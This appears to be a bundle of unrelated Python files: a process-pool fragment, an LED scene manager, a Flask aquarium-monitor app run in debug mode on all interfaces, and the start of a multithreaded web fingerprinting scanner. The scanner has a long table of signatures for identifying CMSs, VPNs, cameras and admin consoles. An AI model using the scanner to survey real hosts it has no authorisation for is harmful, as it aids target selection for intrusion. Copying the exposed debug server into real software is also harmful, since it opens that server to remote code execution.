args = ( rem_stdout, rem_stderr, child_id, rem_job_conn, rem_exc_conn,
self._max_chunk_size, itr ),
name = child_id + "child_chunks")
else:
child = Process(target = _child,
args = ( rem_stdout, rem_stderr, rem_job_conn, rem_exc_conn, child_id ),
name = child_id + "child")
child.daemon = True
print(child_id, "child ALIVE", child.is_alive())
child.start()
print(child_id, "child ALIVE", child.is_alive())
thr_stdout = threading.Thread(target = self._stdout_thread, args = ( loc_stdout, ),
name = child_id + "stdout")
thr_stdout.daemon = True
thr_stdout.start()
thr_stderr = threading.Thread(target = self._stderr_thread, args = ( loc_stderr, ),
name = child_id + "stderr")
thr_stderr.daemon = True
thr_stderr.start()
thr_rcv = threading.Thread(target = self._receiver_thread if itr is None else self._fast_receiver_thread,
args = ( loc_job_conn, done_append ),
name = child_id + "rcv")
thr_rcv.daemon = True
thr_rcv.start()
thr_exc = threading.Thread(target = self._exception_thread, args = ( loc_exc_conn, ),
name = child_id + "exc")
thr_exc.daemon = True
thr_exc.start()
thr_snd = threading.Thread(target = self._sender_thread,
args = ( loc_job_conn, rem_job_conn, rem_exc_conn, rem_stdout, rem_stderr,
thr_stdout, thr_stderr, thr_rcv, thr_exc, child, itr ),
name = child_id + "snd")
thr_snd.daemon = True
thr_snd.start()
_childs.add(thr_snd)
print("_start_child STARTED", self._child_cnt)
def _submit(self, fn, done_callback, args, kwargs):
if _shutdown:
raise ValueError("Pool not running")
#print("_submit", args, kwargs)
if (self._child_cnt == 0) or ((self._child_cnt < self.max_childs) and self.jobs):
self._start_child(None, True)
self.jobs.append(( fn, done_callback, args, kwargs ))
if _job_cnt._value < 1:
# Locking is expensive. So only use it when needed.
_job_cnt.release()
def submit(self, fn, *args, **kwargs):
self._submit(fn, True, args, kwargs)
def submit_done(self, fn, done_callback, *args, **kwargs):
self._submit(fn, done_callback, args, kwargs)
def map(self, fn, itr, done_append = True, shutdown_timeout = None):
# done can be False, True or function
if _shutdown:
raise ValueError("Pool not running")
itr = [ ( fn, it ) for it in itr ]
chunksize, extra = divmod(len(itr), self.max_childs)
if extra:
chunksize += 1
if self._max_chunk_size < 1:
self._max_chunk_size = chunksize
it = iter(itr)
for i in range(min(len(itr), self.max_childs)):
self._start_child(list(itertools.islice(it, chunksize)), done_append)
if not shutdown_timeout is None:
self.shutdown(shutdown_timeout)
def _join_thread(self, thread, t, timeout):
print("_join_thread", thread)
global _shutdown
dt = 0.1 if timeout is None else t - time.time()
while True:
try:
thread.join(dt)
if not thread.is_alive():
return True
if not timeout is None:
raise TimeoutError("Failed to join thread %s" % thread.name)
except KeyboardInterrupt:
_shutdown = True
raise
except:
pass
def shutdown(self, timeout = None):
global _shutdown
print("shutdown", timeout)
for _ in range(self.max_childs):
self.jobs.append(None)
_job_cnt.release()
t = None if timeout is None else time.time() + timeout
print("SHUTDOWN#1", len(_childs))
for nr, thr_snd in enumerate(_childs):
print("SHUTDOWN", nr)
self._join_thread(thr_snd, t, timeout)
print("SHUTDOWN#2")
_childs.clear()
if hasattr(self, "_thr_done"):
_shutdown = True
self._done_cnt.release()
self._join_thread(self._thr_done, t, timeout)
if hasattr(self, "_thr_failed"):
_shutdown = True
self._failed_cnt.release()
self._join_thread(self._thr_failed, t, timeout)
def cancel(self):
global _shutdown
_shutdown = True
for _ in range(self.max_childs):
self.jobs.appendleft(None)
_job_cnt.release()
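# Hedged usage sketch for the Pool above, mirroring the submit/shutdown flow
# that the debug prints trace. The worker function and inputs are illustrative,
# and output may be noisy because this is the debug variant of the pool.
def _square(x):
    return x * x

def _print_result(value):
    print(value)

if __name__ == "__main__":
    with Pool(max_childs=2, done_callback=_print_result) as pool:
        for i in range(8):
            pool.submit(_square, i)
    # __exit__ calls shutdown(), which queues a stop marker per child and joins them.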
|
scene_manager.py
|
from multiprocessing import Process, Queue, Lock
from Queue import Empty
import time
import opc
import sys
import numpy as np
import utilities.process_descriptor as pd
from utilities.sleep_timer import SleepTimer
import logging
import utilities.logging_server
import argparse
from utilities import logging_handler_setup
from core.devices.fft_device import FftDevice
from core.devices import construct_output_devices, construct_input_devices, combine_channel_dicts
from core.devices.app_device import AppDevice
class SceneManager(object):
"""
    SceneManager is responsible for running a scene.
    It runs a set of devices (currently only output devices), combines their pixel data and forwards it to the OPC server.
TODO: Handling for input devices
"""
def __init__(self,
input_devices,
output_devices,
scene_fps=60,
device_fps=30,
opc_host="127.0.0.1",
opc_port=7890,
r_scaling = 0.5,
g_scaling = 0.5,
b_scaling = 0.5
):
"""
Initialisation connects to the opc server
Note: This does not run device processes, that's the job of the start command
"""
# Connect to opc client
opc_ip = opc_host + ":" + str(opc_port)
self.client = opc.Client(opc_ip)
if not self.client.can_connect():
raise Exception("Could not connect to opc at " + opc_ip)
# Set fps for scene and device
self.scene_fps = scene_fps
self.device_fps = device_fps
self.input_devices = input_devices
self.output_devices = output_devices
self.scaling = np.array([r_scaling, g_scaling, b_scaling])
# A list of dictionaries which are the device's pixel colors by channel
# Serves as a reference of all the scene pixel colors that get sent to opc in the loop
self.output_device_pixel_dictionary_list = [device.pixel_colors_by_channel_255 for device in self.output_devices]
self.logger = logging_handler_setup("SceneManager")
def start(self):
"""
        Runs the scene forever using the configured input and output devices.
"""
# Initialise
self.start_input_devices()
self.start_output_devices()
# Main loop
sleep_timer = SleepTimer(1.0/self.scene_fps)
while True:
sleep_timer.start()
self.process_input_devices()
self.process_output_devices()
self.update_opc()
sleep_timer.sleep()
# TODO: kill input/output device processes
def start_output_devices(self):
"""
Start output device processes
"""
for device in self.output_devices:
device.fps = self.device_fps
device.start()
def start_input_devices(self):
"""
Start input device processes
"""
# HACK: Need a more generic way to share queues between devices
# App device must be specified after fft in this way
fft_in_queue = None
for device in self.input_devices:
if type(device) == AppDevice:
device.start(self.output_devices, fft_in_queue)
elif type(device) == FftDevice:
fft_in_queue = device.in_queue
device.start()
else:
# Assume start takes no args by default
device.start()
def process_input_devices(self):
"""
Gets data from input devices and passes them onto output devices
TODO: broadcast to specific devices
"""
for input_device in self.input_devices:
# Get data from the queue until cleared
while True:
item = input_device.get_out_queue()
if item is None:
break
# print item
# Pass onto output devices
for output_device in self.output_devices:
output_device.in_queue.put(item)
def process_output_devices(self):
"""
Retrieve pixels from all output devices
"""
# Update pixel lists if new data has arrived
for i, device in enumerate(self.output_devices):
# Get the device queue mutex
with device.queue_mutex:
pixel_dict = device.get_out_queue()
if pixel_dict:
self.output_device_pixel_dictionary_list[i] = pixel_dict
def update_opc(self):
"""
Sends the latest pixels to opc
"""
# Combine the scene pixels into one concatenated dictionary keyed by channel number
# Multiple devices using the same channel are combined with the same ordering as the devices list
channels_combined = {}
for pixel_dict in self.output_device_pixel_dictionary_list:
for channel, pixels in pixel_dict.items():
if channel in channels_combined:
channels_combined[channel].extend(pixels)
else:
channels_combined[channel] = [p for p in pixels]
# Pass onto OPC client
for channel, pixels in channels_combined.items():
scaled_pixels = np.array(np.array(pixels) * self.scaling).astype(int)
self.client.put_pixels(scaled_pixels, channel=channel)
def run_scene(scene_path):
"""
Runs a scene from a scene path
"""
parsed_scene = pd.read_json(scene_path)
# Form devices
input_devices = construct_input_devices(parsed_scene["InputDevices"])
output_devices = construct_output_devices(parsed_scene["OutputDevices"])
scene = SceneManager(input_devices, output_devices, **parsed_scene["SceneDetails"])
# Yaaay! Scene time
scene.start()
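# Hedged sketch of the scene-file shape that run_scene() expects, inferred from
# the keys read above; the real device schemas live in core.devices and
# utilities.process_descriptor, so the empty lists are placeholders.
EXAMPLE_SCENE = {
    "InputDevices": [],
    "OutputDevices": [],
    "SceneDetails": {"scene_fps": 60, "device_fps": 30, "opc_host": "127.0.0.1", "opc_port": 7890},
}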
def main(args):
# Parse Args
parser = argparse.ArgumentParser(description="Run a scene for us all to marvel")
parser.add_argument("scene_path", help="Path to scene json file")
parser_args = parser.parse_args(args)
# Start the logging server
logging_process = Process(target=utilities.logging_server.main)
logging_process.daemon = True
logging_process.start()
run_scene(parser_args.scene_path)
if __name__ == '__main__':
main(sys.argv[1:])
|
program.py
|
#!/usr/bin/env python
config = "/data/config.py"
from config import *
import sys
import sqlite3
import time
import threading
from flask import Flask, Response, redirect, request, url_for
import signal
import subprocess
global conn
try:
    conn = sqlite3.connect(db_location, check_same_thread=False)
    print("CONNECTED TO DATABASE")
except:
    print("FAILED TO CONNECT TO DATABASE!!!!!!!!!!!!!!")
app = Flask(__name__)
global taco1
taco1 = 1
global taco2
taco2 = 1
global taco3
taco3 = 1
global x
global distance
distance = 10
x = 0
y = 0
z = 0
global identity
global ph
global temp
global sump
identity = 1
ph = "NOT REGISTERED YET"
temp = "NOT REGISTERED YET"
sump = "NOT REGISTERED YET"
def getinfo():
global identity
global ph
global temp
global sump
while x < 100:
try:
cursor = conn.execute("SELECT id, ph, temp, sump from tank")
for row in cursor:
identity = row[0]
ph = row[1]
temp = row[2]
sump = row[3]
time.sleep(1)
except KeyboardInterrupt:
print "CLOSING getinfo"
conn.close()
sys.exit()
def signal_handler(signal, frame):
    print('You pressed Ctrl+C!')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def events():
global identity
global ph
global temp
global sump
while x < 100:
try:
now = "data: " + str(ph) + "%" + str(temp) + \
"%" + str(sump) + "\n\n"
time.sleep(1)
yield now
except KeyboardInterrupt:
print "CLOSING events"
conn.close()
sys.exit()
@app.route('/')
def index():
if request.headers.get('accept') == 'text/event-stream':
return Response(events(), content_type='text/event-stream')
return redirect(url_for('static', filename='index.html'))
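# ---------------------------------------------------------------------------
# Hedged sketch (not part of the original script): how a client might unpack
# one Server-Sent Events message produced by events() above. The wire format
# "data: <ph>%<temp>%<sump>\n\n" is taken from the code; the sample values in
# the usage comment are made up.
# ---------------------------------------------------------------------------
def _parse_tank_event(raw):
    """Split one SSE message from events() into its three readings."""
    payload = raw.strip()
    if payload.startswith("data: "):
        payload = payload[len("data: "):]
    ph_value, temp_value, sump_value = payload.split("%")
    return {"ph": ph_value, "temp": temp_value, "sump": sump_value}
# Example: _parse_tank_event("data: 7.2%25.4%OK\n\n")
# -> {'ph': '7.2', 'temp': '25.4', 'sump': 'OK'}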
if __name__ == "__main__":
a = threading.Thread(target=getinfo)
a.daemon = True
a.start()
app.run(host='0.0.0.0', port=3000, debug=True,
use_reloader=False, threaded=True)
conn.close()
|
cmsfinger.py
|
# -*- coding:utf-8 -*-
import os, sys
import threading
import time
import re
import ctypes
import urllib.request, urllib.parse, urllib.error
import socket
import http.cookiejar
import zlib
import struct
import io
class Log():
FILE = ''
LOGLOCK = None
std_out_handle = None
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
GRAY = 0x08
GREEN = 0x0a
BLUE = 0x0b
RED = 0x0c
PINK = 0x0d
YELLOW = 0x0e
WHITE = 0x0f
@staticmethod
def INIT():
Log.std_out_handle = ctypes.windll.kernel32.GetStdHandle(Log.STD_OUTPUT_HANDLE)
if Log.LOGLOCK == None:
Log.LOGLOCK = threading.RLock()
@staticmethod
def set_cmd_text_color(color):
return ctypes.windll.kernel32.SetConsoleTextAttribute(Log.std_out_handle, color)
@staticmethod
def resetColor():
Log.set_cmd_text_color(Log.WHITE)
@staticmethod
def console(line, color=YELLOW):
line = line + '\n'
Log.LOGLOCK.acquire()
Log.set_cmd_text_color(color)
sys.stdout.write(line)
Log.resetColor()
Log.LOGLOCK.release()
@staticmethod
def file(line, color=GREEN):
Log.console(line, color)
line = line + '\n'
if Log.FILE != '':
Log.LOGLOCK.acquire()
f = open(Log.FILE, 'a')
f.write(line)
f.close()
Log.LOGLOCK.release()
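# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original tool): the Log helper above is
# Windows-only (it recolours the console through ctypes.windll), and INIT()
# must run once before console()/file() so the output handle and lock exist.
# The 'scan.log' path is an illustrative assumption, not a file this script
# necessarily uses.
# ---------------------------------------------------------------------------
def _log_usage_example():
    Log.INIT()
    Log.FILE = 'scan.log'                # optional: also append every line to a file
    Log.console('console only', Log.BLUE)
    Log.file('console and scan.log')     # default colour is GREEN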
class AHTTPErrorProcessor(urllib.request.HTTPErrorProcessor):
def http_response(self, req, response):
code, msg, hdrs = response.code, response.msg, response.info()
if code == 302: return response # stop 302
if not (200 <= code < 300):
response = self.parent.error('http', req, response, code, msg, hdrs)
return response
https_response = http_response
class HttpSession():
UserAgent = 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'
def __init__(self, url='', follow302=True):
self.jar = http.cookiejar.CookieJar()
self.url = url
self.html = ''
self.headers = ''
self.jumpurl = ''
self.follow302 = follow302
self.opener = None
@staticmethod
def make_cookie(name, value, domain):
return http.cookiejar.Cookie(
version=0,
name=name,
value=value,
port=None,
port_specified=False,
domain=domain,
domain_specified=True,
domain_initial_dot=False,
path="/",
path_specified=True,
secure=False,
expires=None,
discard=False,
comment=None,
comment_url=None,
rest=None
)
def Get(self, url='', data=None):
if url != '':
self.url = url
if self.url == '':
self.Update('')
return False
if self.opener == None:
if self.follow302:
self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.jar))
else:
self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.jar),
AHTTPErrorProcessor)
self.opener.addheaders = [
('User-Agent', HttpSession.UserAgent),
# ('Accept-Encoding', 'gzip, deflate'),
]
try:
return self.__GetHtml(data)
except:
self.html = ''
self.jumpurl = ''
return False
    def __GetHtml(self, data):
        try:
            if data is None:
                response = self.opener.open(self.url, timeout=10)
            else:
                # POST data must be bytes under Python 3
                response = self.opener.open(self.url, urllib.parse.urlencode(data).encode('utf-8'), timeout=10)
            self.html = response.read()
            self.jumpurl = response.url
            self.headers = dict(response.info())
            return True
        except urllib.error.HTTPError as e:
            # The HTTPError object carries the response for non-2xx replies
            self.html = e.read()
            self.jumpurl = e.url
            self.headers = dict(e.info())
            return True
        except:
            self.html = ''
            self.jumpurl = ''
            return False
def Update(self, url):
self.html = ''
self.jumpurl = ''
self.headers = ''
self.url = url
def AddCookie(self, name, value, site):
self.jar.set_cookie(HttpSession.make_cookie(name, value, site))
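# ---------------------------------------------------------------------------
# Hedged sketch (not part of the original tool): one plausible way the rule
# dictionaries in the `fingers` table below could be checked against a page
# fetched with HttpSession. The real matching routine is defined elsewhere in
# this script; this helper only illustrates the rule shape
# ({"title": [...]} / {"header": [...]} / {"body": [...]}), reading each dict
# as an AND of its needles and the list of dicts as OR alternatives.
# ---------------------------------------------------------------------------
def _rule_matches_example(session, rules):
    html = session.html.decode('utf-8', 'ignore') if isinstance(session.html, bytes) else session.html
    headers = '\n'.join('%s: %s' % kv for kv in session.headers.items()) if isinstance(session.headers, dict) else ''
    title_match = re.search(r'<title>(.*?)</title>', html, re.I | re.S)
    title = title_match.group(1) if title_match else ''
    for rule in rules:                       # OR across the rule dictionaries
        hit = True
        for where, needles in rule.items():  # AND within a single dictionary
            haystack = {'title': title, 'header': headers, 'body': html}.get(where, '')
            if not all(needle in haystack for needle in needles):
                hit = False
                break
        if hit:
            return True
    return False
# Example:
#     s = HttpSession('http://example.com/')
#     if s.Get():
#         print(_rule_matches_example(s, [{"header": ["Server: Apache"]}]))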
class Tasker():
def __init__(self, resource, threadsnum=5):
self.lock = threading.RLock()
self.taskpool = []
self.resource = resource
        self.threadsnum = threadsnum
self.bend = False
def run(self):
threads = []
t = threading.Thread(target=self.taskadder, args=())
t.start()
threads.append(t)
for i in range(0, self.threadsnum):
t = threading.Thread(target=self.taskgeter, args=())
t.start()
threads.append(t)
for t in threads:
t.join()
def taskadder(self):
if isinstance(self.resource, list):
for line in self.resource:
resolved = self.resolvetask(line)
self.taskpool += resolved
tmpfile = None
if isinstance(self.resource, str):
tmpfile = open(self.resource)
if isinstance(self.resource, io.IOBase) or tmpfile:
if not tmpfile:
tmpfile = self.resource
if tmpfile:
for line in tmpfile:
line = line.strip('\r\n')
while True:
self.lock.acquire()
if len(self.taskpool) > self.threadsnum * 3:
self.lock.release()
time.sleep(0.1)
continue
else:
resolved = self.resolvetask(line)
self.taskpool += resolved
self.lock.release()
break
self.lock.acquire()
self.bend = True
self.lock.release()
if isinstance(self.resource, str):
tmpfile.close()
def taskgeter(self):
currenttask = None
while True:
self.lock.acquire()
if len(self.taskpool) > 0:
currenttask = self.taskpool[0]
del self.taskpool[0]
self.lock.release()
else:
if self.bend:
self.lock.release()
return
self.lock.release()
time.sleep(0.1)
continue
self.taskprocesser(currenttask)
def taskprocesser(self, task):
sys.stdout.write(task + '\n')
def resolvetask(self, task):
return [task]
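# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original tool): Tasker above is meant to
# be specialised by overriding taskprocesser() (and, if one input line should
# expand into several tasks, resolvetask()). run() starts one feeder thread
# plus threadsnum worker threads and joins them all. The subclass and target
# URLs below are illustrative only.
# ---------------------------------------------------------------------------
class _EchoTasker(Tasker):
    def taskprocesser(self, task):
        # Replace this with real per-target work, e.g. fetching the task with
        # HttpSession and testing it against the fingerprint rules below.
        print('processing %s' % task)
# Example:
#     _EchoTasker(['http://example.com/', 'http://example.org/'], threadsnum=2).run()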
fingers = [
("ACSNO网络探针", "http://www.acsno.com.cn/product_view.php?id=78", "4/22/2015",
[{"title": ["探针管理与测试系统-登录界面"], "header": ["h123"]}]),
("网趣网上购物系统旗舰版", "http://www.cnhww.com/list.asp?id=8", "4/17/2015", [{"header": ["Set-Cookie: dmwh%5Fuser"]}, {
"body": ["class.asp?lx=tejia", "images/cnhww_css.css", "Wq_StranJF.js"]}]),
("网康 NS-ASG", "http://www.netentsec.com", "4/17/2015",
[{"title": ["NS-ASG"]}, {"body": ["commonplugin/softkeyboard.js"]}]),
("方维众筹", "http://www.fanwe.com/index.php?ctl=zongchou#yanshi", "4/17/2015",
[{"body": ["app/Tpl/fanwe_1/images/lazy_loading.gif", "index.php?ctl=article_cate"]}]),
("无忧购物系统ASP通用版", "http://www.gzwyshop.com/Pdt_zz.asp", "4/17/2015",
[{"body": ["images/loginh2.gif", "nsort.asp?sort_id="]}]),
("XYCMS", "http://www.yuleroom.cn/", "4/17/2015", [{"title": ["Powered by XYCMS"]}, {"body": ["advfile/ad12.js"]}]),
("JSPGOU", "http://demo3.jeecms.com/", "4/17/2015",
[{"title": ["Powered by JSPGOU"]}, {"body": ["/r/gou/www/css/", "shopMember/index.jspx"]}]),
("Jspxcms", "http://www.jspxcms.com/", "4/17/2015",
[{"title": ["Powerd by Jspxcms"]}, {"body": ["_files/jspxcms.css"]}]),
("惠尔顿上网行为管理系统", "http://www.wholeton.com/", "4/16/2015", [{"body": ["updateLoginPswd.php", "PassroedEle"]}]),
("milu_seotool", "http://addon.discuz.com/?ac=item&from=api_1&id=milu_seotool.plugin", "4/7/2015",
[{"body": ["plugin.php?id=milu_seotool"]}]),
("Privoxy", "http://www.privoxy.org", "4/7/2015", [{"header": ["Proxy-Agent: Privoxy"]}]),
("seeyoo广告机", "http://www.seeyoo.cn/", "3/30/2015", [{"body": ["AC_Config.js"]}]),
("埃森诺网络服务质量检测系统", "http://www.acsno.com.cn", "3/29/2015", [{"title": ["埃森诺网络服务质量检测系统"]}]),
("Mercurial", "http://mercurial.selenic.com/", "2/27/2015", [{"title": ["Mercurial repositories index"]}]),
("一采通", "http://www.1caitong.com", "1/27/2015", [{"body": ["/custom/GroupNewsList.aspx?GroupId="]}]),
("O2OCMS", "http://www.zzqss.com/", "1/26/2015", [{"body": ["/index.php/clasify/showone/gtitle/"]}]),
("全国烟草系统", "#", "1/26/2015", [{"body": ["ycportal/webpublish"]}]),
("万户网络", "http://www.wanhu.com.cn", "12/15/2014", [{"body": ["css/css_whir.css"]}]),
("ExtMail", "http://www.extmail.org", "12/15/2014",
[{"title": ["欢迎使用ExtMail"]}, {"body": ["setCookie('extmail_username"]}]),
("金龙卡金融化一卡通网站查询子系统", "http://www.posser.net/", "12/11/2014",
[{"title": ["金龙卡金融化一卡通网站查询子系统"]}, {"body": ["location.href=\"homeLogin.action"]}]),
("ezOFFICE", "http://www.whir.net/cn/ezofficeqyb/index_52.html", "12/11/2014",
[{"title": ["Wanhu ezOFFICE"]}, {"body": ["EZOFFICEUSERNAME"]}]),
("GlassFish", "https://glassfish.java.net", "12/11/2014", [{"header": ["Server: GlassFish Server"]}]),
("Piwigo", "http://cn.piwigo.org", "12/3/2014",
[{"body": ["generator\" content=\"Piwigo"]}, {"header": ["pwg_id"]}]),
("天柏在线培训/考试系统", "http://www.timber2005.com/", "12/2/2014",
[{"title": ["连接中,请稍候"], "header": ["index.html"]}, {"body": ["App_Image/PXSystem"]},
{"body": ["App_Image/System"]}]),
("Dorado", "http://bstek.com/product/dorado7_introduce", "12/2/2014", [{"title": ["Dorado Login Page"]}]),
("openEAP", "http://products.suntektech.com/products/archive.jsp?catid=327&id=269", "12/2/2014",
[{"title": ["openEAP_统一登录门户"]}]),
("hikashop", "http://www.hikashop.com", "11/28/2014", [{"body": ["/media/com_hikashop/css/"]}]),
("PigCms", "http://pigcms.com", "11/27/2014", [{"header": ["X-Powered-By: PigCms.com"]}]),
("帕拉迪统一安全管理和综合审计系统", "http://www.pldsec.com/", "11/26/2014", [{"body": ["module/image/pldsec.css"]}]),
("qibosoft v7", "http://www.qibosoft.com/", "11/25/2014", [{"body": ["/images/v7/cms.css\">"]}]),
("KXmail", "http://mail.pushmold.com", "11/25/2014",
[{"body": ["Powered By <a href=\"http://www.kxmail.net"]}, {"title": ["科信邮件系统"]}]),
("易创思ecs", "http://www.ecs.cn/", "11/25/2014", [{"body": ["src=\"/Include/EcsServerApi.js"]}]),
("URP 综合教务系统", "http://jwxt.bibt.edu.cn/", "11/25/2014",
[{"body": ["<input name=\"j_captcha_response\" type=\"hidden"]}, {"title": ["URP 综合教务系统"]}]),
("webbuilder", "http://www.putdb.com", "11/25/2014", [{"body": ["src=\"webbuilder/script/wb.js"]}]),
("e-Learning", "http://nvcc.cneln.net", "11/25/2014", [{"body": ["method=\"post\" action=\"/eln3_asp/login.do"]}]),
("ruvar", "http://gov.ruvar.com/", "11/25/2014", [{"body": [
"<iframe id=\"ifrm\" width=\"100%\" height=\"100%\" frameborder=\"0\" scrolling=\"no\" src=\"/include/login.aspx"]}]),
("acsoft", "http://ac.haidilao.com/", "11/25/2014", [{"body": ["login_1\">CA密码"]}, {"title": ["费用报销系统"]}]),
("lezhixing", "http://202.108.154.209/datacenter/#", "11/25/2014", [{"body": ["var contextPath = \"/datacenter"]}, {
"body": ["location.href=contextPath+\"/login/password/password.jsp"]}, {"body": [
"action=\"/datacenter/authentication/login.do\" method=\"post"]}]),
("yunyin", "http://press.njtu.edu.cn", "11/25/2014",
[{"body": ["技术支持:云因信息"]}, {"body": ["<a href=\"../scrp/getpassword.cfm"]},
{"body": ["/scrp/book.cfm\" method=\"post\">"]}]),
("某通用型政府cms", "http://www.wooyun.org/bugs/wooyun-2014-054821", "11/17/2014", [{"body": ["/deptWebsiteAction.do"]}]),
("U-Mail", "http://www.comingchina.com", "11/16/2014",
[{"body": ["<BODY LINK=\"White\" VLINK=\"White\" ALINK=\"White\">"]}]),
("IP.Board", "http://www.invisionpower.com/apps/board/", "11/13/2014", [{"body": ["ipb.vars"]}]),
("i@Report", "http://sanlink.com.cn", "11/11/2014",
[{"body": ["ESENSOFT_IREPORT_SERVER"]}, {"body": ["com.sanlink.server.Login"]}, {"body": ["ireportclient"]},
{"body": ["css/ireport.css"]}]),
("国家数字化学习资源中心系统", "http://ipv6.google.com.hk/#newwindow=1&q=%22技术支持:中央广播电视大学现代远程教育资源中心%22", "11/11/2014",
[{"title": ["页面加载中,请稍候"], "body": ["FrontEnd"]}]),
("UcSTAR", "http://www.qqtech.com/comm/index.htm", "11/11/2014", [{"title": ["UcSTAR 管理控制台"]}]),
("mod_antiloris", "http://sourceforge.net/projects/mod-antiloris/", "11/10/2014", [{"header": ["mod_antiloris"]}]),
("CISCO_VPN", "http://www.cisco.com/", "11/7/2014", [{"header": ["webvpn"]}]),
("Axis2", "http://axis.apache.org/axis2/", "11/7/2014",
[{"body": ["axis2-web/css/axis-style.css"]}, {"title": ["Axis 2 - Home"]}, {"title": ["Apache-Axis"]}]),
("Puppet_Node_Manager", "http://puppetlabs.com", "11/6/2014", [{"title": ["Puppet Node Manager"]}]),
("Kibana", "http://www.elasticsearch.org/overview/kibana/", "11/6/2014",
[{"title": ["Kibana"]}, {"body": ["kbnVersion"]}]),
("HAProxy_Report", "http://haproxy.com", "11/6/2014", [{"body": ["Statistics Report for HAProxy"]}]),
("Spark_Master", "http://spark.apache.org", "11/6/2014", [{"title": ["Spark Master at"]}]),
("Spark_Worker", "http://spark.apache.org", "11/6/2014", [{"title": ["Spark Worker at"]}]),
("GenieATM", "http://www.genienrm.com/index.php", "11/6/2014",
[{"title": ["GenieATM"]}, {"body": ["Copyright© Genie Networks Ltd."]}, {"body": ["defect 3531"]}]),
("dasannetworks", "http://www.dasannetworks.com/en/index.asp", "11/3/2014",
[{"body": ["clear_cookie(\"login\");"]}]),
("eagleeyescctv", "http://www.eagleeyescctv.com/", "11/3/2014",
[{"body": ["IP Surveillance for Your Life"]}, {"body": ["/nobody/loginDevice.js"]}]),
("Linksys_SPA_Configuration", "http://www.linksys.com", "11/3/2014", [{"title": ["Linksys SPA Configuration"]}]),
("CDR-Stats", "http://www.cdr-stats.org", "11/3/2014",
[{"title": ["CDR-Stats | Customer Interface"]}, {"body": ["/static/cdr-stats/js/jquery"]}]),
("SHOUTcast", "http://www.shoutcast.com", "11/3/2014", [{"title": ["SHOUTcast Administrator"]}]),
("SLTM32_Configuration", "http://www.lgericssonipecs.com", "11/3/2014",
[{"title": ["SLTM32 Web Configuration Pages "]}]),
("ntop", "https://www.ntop.org", "11/3/2014",
[{"body": ["Global Traffic Statistics"]}, {"header": ["Server: ntop"]}, {"body": ["ntopMenuID"]}]),
("SquirrelMail", "http://www.squirrelmail.org", "11/3/2014", [{"header": ["SQMSESSID"]}]),
("PineApp", "http://www.pineapp.com", "11/3/2014",
[{"title": ["PineApp WebAccess - Login"]}, {"body": ["/admin/css/images/pineapp.ico"]}]),
("Synology_DiskStation", "https://www.synology.com", "11/3/2014",
[{"title": ["Synology DiskStation"]}, {"body": ["SYNO.SDS.Session"]}]),
("OnSSI_Video_Clients", "http://www.onssi.com", "11/3/2014",
[{"title": ["OnSSI Video Clients"]}, {"body": ["x-value=\"On-Net Surveillance Systems Inc.\""]}]),
("LiteSpeed_Web_Admin_Console", "http://www.litespeedtech.com", "11/3/2014",
[{"title": ["LiteSpeed Web Admin Console"]}, {"header": ["LSWSWEBUI"]}]),
("FortiGuard", "http://www.fortiguard.com/static/webfiltering.html", "11/3/2014",
[{"body": ["FortiGuard Web Filtering"]}, {"title": ["Web Filter Block Override"]},
{"body": ["/XX/YY/ZZ/CI/MGPGHGPGPFGHCDPFGGOGFGEH"]}]),
("Centreon", "http://www.centreon.com", "11/3/2014",
[{"body": ["Generator\" content=\"Centreon - Copyright"]}, {"title": ["Centreon - IT & Network Monitoring"]}]),
("blog_fc2", "http://blog.fc2.com", "11/3/2014", [{"header": ["bloguid", "cookietest=test"]}]),
("shopify", "http://www.shopify.com", "11/3/2014", [{"header": ["X-Shopid:"]}]),
("sugon_gridview", "http://www.sugon.com/product/detail/productid/105.html", "10/29/2014",
[{"body": ["/common/resources/images/common/app/gridview.ico"]}]),
("concrete5", "http://www.concrete5.org", "10/26/2014",
[{"body": ["generator\" content=\"ezCMS"]}, {"header": ["CONCRETE5"]}, {"body": ["CCM_DISPATCHER_FILENAME"]}]),
("WebsiteBaker-CMS", "http://www.websitebaker-cms.de", "10/26/2014", [{"header": ["wb_session_id"]}]),
("DokuWiki", "https://www.dokuwiki.org", "10/26/2014",
[{"body": ["generator\" content=\"DokuWiki"]}, {"header": ["DokuWiki"]}]),
("Directadmin", "http://www.directadmin.com", "10/26/2014",
[{"header": ["X-Directadmin"]}, {"header": ["DirectAdmin Daemon"]}, {"title": ["DirectAdmin Login"]}]),
("Diferior", "http://diferior.com", "10/26/2014", [{"body": ["Powered by Diferior"]}]),
("DVWA", "http://www.dvwa.co.uk", "10/26/2014",
[{"title": ["Damn Vulnerable Web App"]}, {"body": ["dvwa/images/login_logo.png"]}]),
("wordpress_qTranslate", "http://www.qianqin.de/qtranslate/", "10/26/2014", [{"header": ["qtrans_cookie_test"]}]),
("网神VPN", "http://www.legendsec.com", "10/26/2014",
[{"body": ["admin/js/virtual_keyboard.js"]}, {"header": ["host_for_cookie"]}]),
("nginx_admin", "http://www.nginxcp.com", "10/26/2014", [{"header": ["nginx admin"]}]),
("Storm", "http://storm.apache.org", "10/24/2014", [{"title": ["Storm UI"]}, {"body": ["stormtimestr"]}]),
("Privoxy代理", "http://www.privoxy.org", "10/24/2014", [{"header": ["Privoxy"]}]),
("dayrui系列产品", "http://www.dayrui.com/product/", "10/23/2014",
[{"header": ["dr_ci_session"]}, {"body": ["dayrui/statics"]}]),
("FineCMS", "http://www.dayrui.com", "10/23/2014",
[{"body": ["Powered by FineCMS"]}, {"body": ["dayrui@gmail.com"]}, {"body": ["Copyright\" content=\"FineCMS"]}]),
("MaticsoftSNS_动软分享社区", "http://sns.maticsoft.com", "10/23/2014",
[{"body": ["MaticsoftSNS"]}, {"body": ["maticsoft", "/Areas/SNS/"]}]),
("Maticsoft_Shop_动软商城", "http://www.maticsoft.com/Products.aspx#shop", "10/23/2014",
[{"body": ["Maticsoft Shop"]}, {"body": ["maticsoft", "/Areas/Shop/"]}]),
("hishop", "http://www.hishop.com.cn", "10/23/2014",
[{"body": ["hishop.plugins.openid"]}, {"body": ["Hishop development team"]}]),
